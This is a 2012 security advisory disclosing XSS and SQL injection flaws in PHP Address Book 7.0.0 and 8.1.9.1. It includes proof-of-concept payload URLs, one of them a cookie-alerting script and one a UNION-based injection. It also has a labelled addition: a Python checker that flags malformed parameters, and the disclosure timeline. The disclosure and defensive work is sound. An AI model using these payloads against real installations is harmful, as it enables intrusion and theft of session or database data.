SSCHADV2012-013 - PHP Address Book 7.0.0 and 8.1.9.1 Multiple security vulnerabilities
Advisory: | PHP Address Book 7.0.0 and 8.1.9.1 Multiple security vulnerabilities |
Advisory ID: | SSCHADV2012-013 |
Author: | Stefan Schurtz |
Affected Software: | Successfully tested on PHP Address Book 7.0.0 and 8.1.9.1 (latest version) |
Vendor URL: | |
Vendor Status: | informed |
======================
Vulnerability Description
======================
PHP Address Book 7.0.0 and 8.1.9.1 are prone to multiple cross-site scripting (XSS) and SQL injection (SQLi) vulnerabilities.
==============
PoC-Exploit
==============
// XSS
# GET
http://[target]/addressbookv/preferences.php?from='"</script><script>alert('xss')</script>
http://[target]/addressbookv/group.php/" /><script> alert('xss')</script>
http://[target]/addressbookv/index.php?group='"</script><script>alert(document.cookie)</script>
# POST
http://[target]/addressbookv/translate.php?lang=en&target_language=en&Mode=Range# -> POST-Parameter 'target_language' -> <script>alert('xss')</script>
http://[target]/addressbookv/translate.php?lang=en&target_language=en&Mode=Range# -> POST-Parameter 'target_flag' -> <script>alert('xss')</script>
http://[target]/addressbookv/translate.php?lang=en&target_language='"/><script>alert('xss')</script>&Mode=Range#
// SQLi
http://[target]/addressbookv/edit.php?id=1 AND 1=IF(1<2,2,1)
http://[target]/addressbookv/edit.php?id=1 AND 1=IF(1>2,2,1)
// UNION-based Injection, needs 'magic_quotes=off'
http://[target]/addressbookv/view.php?id=1‘ UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL—+ |
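The advisory lists no fix, so the following is an added example (not part of the advisory and not PHP Address Book code) that checks requests to the scripts named above against an expected shape for each affected parameter, for use when reviewing logs or as a filter in front of the application. The host name, the function name `check_request` and the allowed patterns are assumptions and need tuning to the values the installation legitimately uses.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Allowed value shape per (script, parameter) named in the advisory. The
# patterns are assumptions about legitimate use, not taken from the application.
NUMERIC = re.compile(r"\d{1,10}")
TOKEN = re.compile(r"[A-Za-z0-9 _.-]{0,64}")
RULES = {
    ("edit.php", "id"): NUMERIC,
    ("view.php", "id"): NUMERIC,
    ("preferences.php", "from"): TOKEN,
    ("index.php", "group"): TOKEN,
    ("translate.php", "target_language"): TOKEN,
    ("translate.php", "target_flag"): TOKEN,
}


def check_request(url, post_fields=None):
    """Return findings for one request; an empty list means it passes."""
    parts = urlsplit(url)
    segments = parts.path.split("/")
    findings = []
    # Locate the script and anything appended after it (PATH_INFO), which is
    # where the group.php request carries its markup.
    script = next((s for s in segments if s.endswith(".php")), None)
    if script is None:
        return findings
    if any(segments[segments.index(script) + 1:]):
        findings.append(f"{script}: unexpected path info")
    # Query-string and POST parameters go through the same per-parameter rule.
    params = parse_qsl(parts.query, keep_blank_values=True)
    params += list((post_fields or {}).items())
    for name, value in params:
        rule = RULES.get((script, name))
        if rule is not None and not rule.fullmatch(value):
            findings.append(f"{script}: parameter '{name}' has unexpected value")
    return findings


if __name__ == "__main__":
    base = "http://addressbook.example/addressbookv/"  # constructed host
    samples = [  # constructed requests shaped like the ones listed above
        (base + "edit.php?id=1", None),
        (base + "edit.php?id=1 AND 1=IF(1<2,2,1)", None),
        (base + "group.php/%22%20/%3E%3Cscript%3E", None),
        (base + "translate.php?lang=en", {"target_flag": "<script>"}),
    ]
    for url, post in samples:
        print(url, "->", check_request(url, post) or "ok")
```

A check like this narrows what reaches the application but does not replace parameterized queries and output encoding in the application code itself.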
=====
Solution
=====
-
================
Disclosure Timeline
================
16-May-2012 – vendor informed
05-Jul-2012 – advisory updated: latest version is still vulnerable
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
https://sourceforge.net/tracker/?func=detail&aid=3527242&group_id=157964&atid=8059299
http://www.darksecurity.de/advisories/2012/SSCHADV2012-013.txt